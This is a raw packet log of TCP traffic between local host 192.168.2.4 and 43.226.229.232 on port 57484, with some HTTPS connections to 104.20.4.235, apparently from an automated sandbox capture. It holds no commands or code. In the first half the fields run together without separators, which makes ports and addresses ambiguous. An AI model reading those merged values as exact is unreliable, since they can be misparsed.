                                                                                                Oct 22, 2024 06:17:31.177450895 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.177463055 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.177505970 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.178214073 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.178251028 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.178293943 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.179043055 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179079056 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179111004 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179122925 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.179147005 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179526091 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.292578936 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.292670965 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.292709112 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.292823076 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.293590069 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293644905 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293705940 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.293925047 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293962002 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293973923 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.294745922 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.294783115 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.294842958 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.296705961 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296744108 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296761990 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.296776056 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296811104 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296845913 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296863079 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.296888113 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.297017097 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297051907 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297832012 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297868967 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297890902 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.297911882 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.411190987 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411282063 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411336899 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.411340952 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411889076 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411937952 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411938906 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.412700891 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.412759066 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.412794113 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.128024101 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.128720999 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.128757000 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.128815889 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.129507065 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.129540920 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.129575014 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.129581928 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.130211115 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.130264044 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.168287039 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.168379068 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.168421984 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.168422937 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.242084026 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.242145061 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.242172956 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.242211103 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.242255926 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.242631912 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.242669106 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.242711067 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.243300915 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.243359089 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.243407011 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.244034052 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.244071960 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.244102001 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.244117975 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.244755983 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.244792938 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.244824886 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.244853973 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.244894028 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.245362043 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.245395899 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.245435953 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.246088028 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.246123075 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.246165991 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.246814966 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.246850967 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.246893883 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.247559071 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.247596025 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.247636080 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.248282909 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.248317957 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.248351097 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.248367071 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.248976946 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.249032974 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.287000895 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.287146091 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.287183046 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.287199020 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.360953093 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.361037970 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.361042976 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.361082077 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.361135006 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.361397028 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.361433983 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.361478090 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.362082958 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.362118959 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.362162113 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.362811089 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.362847090 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.362893105 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.363559961 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.363595009 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.363643885 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.364270926 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.364306927 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.364341021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.364358902 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.365021944 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.365056992 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.365072966 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.365798950 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.365834951 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.365844011 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.366461992 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.366497993 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.366509914 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.366532087 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.366574049 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.367175102 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.367208958 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.367258072 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.403024912 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.403074026 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.403111935 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.403131962 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.405668974 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.405740976 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.405761957 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.405810118 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.405869007 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.479717970 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.479866028 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.479903936 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.479917049 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.480345011 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.480381966 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.480391979 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.480906963 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.480941057 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.480953932 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.481554031 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.481587887 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.481597900 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.482287884 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.482322931 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.482341051 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.483021021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.483057022 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.483072042 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.483757973 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.483793020 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.483809948 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.483827114 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.483882904 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.484496117 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.484532118 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.484574080 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.485243082 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.485279083 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.485331059 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.485951900 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.485986948 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.486028910 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.486639023 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.521641970 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.521704912 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.521737099 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.521775961 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.521823883 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.524394035 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.524568081 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.524605036 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.524611950 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.598450899 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.598501921 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.598506927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.598542929 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.598583937 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.598963022 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.598999977 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.599051952 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.599524021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.599555016 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.599587917 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.599598885 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.600260973 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.600296021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.600312948 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.600975037 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.601012945 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.601089001 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.601702929 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.601739883 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.601756096 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.601773024 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.601816893 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.602452040 CEST574844974743.226.229.232192.168.2.4
Oct 22, 2024 06:17:32.602488041 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.602533102 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.603157997 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.603244066 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.603287935 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.603895903 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.603931904 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.603965044 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.603982925 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.604614019 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.604649067 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.604661942 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.640423059 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.640482903 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.640547037 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.640588045 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.640635014 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.642937899 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.643126011 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.643160105 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.643178940 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.643593073 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.643630028 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.643647909 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.644201040 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.644274950 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.686738014 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.686830044 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.686887026 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.716959000 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.717051983 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.717091084 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.717098951 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.717622042 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.717658043 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.717669010 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.718198061 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.718234062 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.718244076 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.718833923 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.718868971 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.718882084 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.719377995 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.719412088 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:32.719429016 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:32.798813105 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:34.794389963 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:34.794480085 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:34.794555902 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:34.796252966 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:34.796293020 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:34.889028072 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:34.895276070 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895343065 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895381927 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895392895 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:34.895411015 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895447016 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895476103 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895503044 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895529985 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895556927 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895582914 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.895768881 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:34.901160955 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.901202917 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.901232004 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.901268005 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.907144070 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.907171965 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.907198906 CEST | 57484 | 49747 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:34.907342911 CEST | 49747 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:35.424791098 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:35.424886942 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:35.426696062 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:35.426724911 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:35.427232027 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:35.432691097 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:35.475326061 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:35.580027103 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:35.580235958 CEST | 443 | 49749 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:35.580306053 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:35.580854893 CEST | 49749 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:42.577632904 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:42.587029934 CEST | 49745 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:17:42.592590094 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:17:43.981947899 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:43.982036114 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:43.982131958 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:43.983951092 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:43.984033108 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
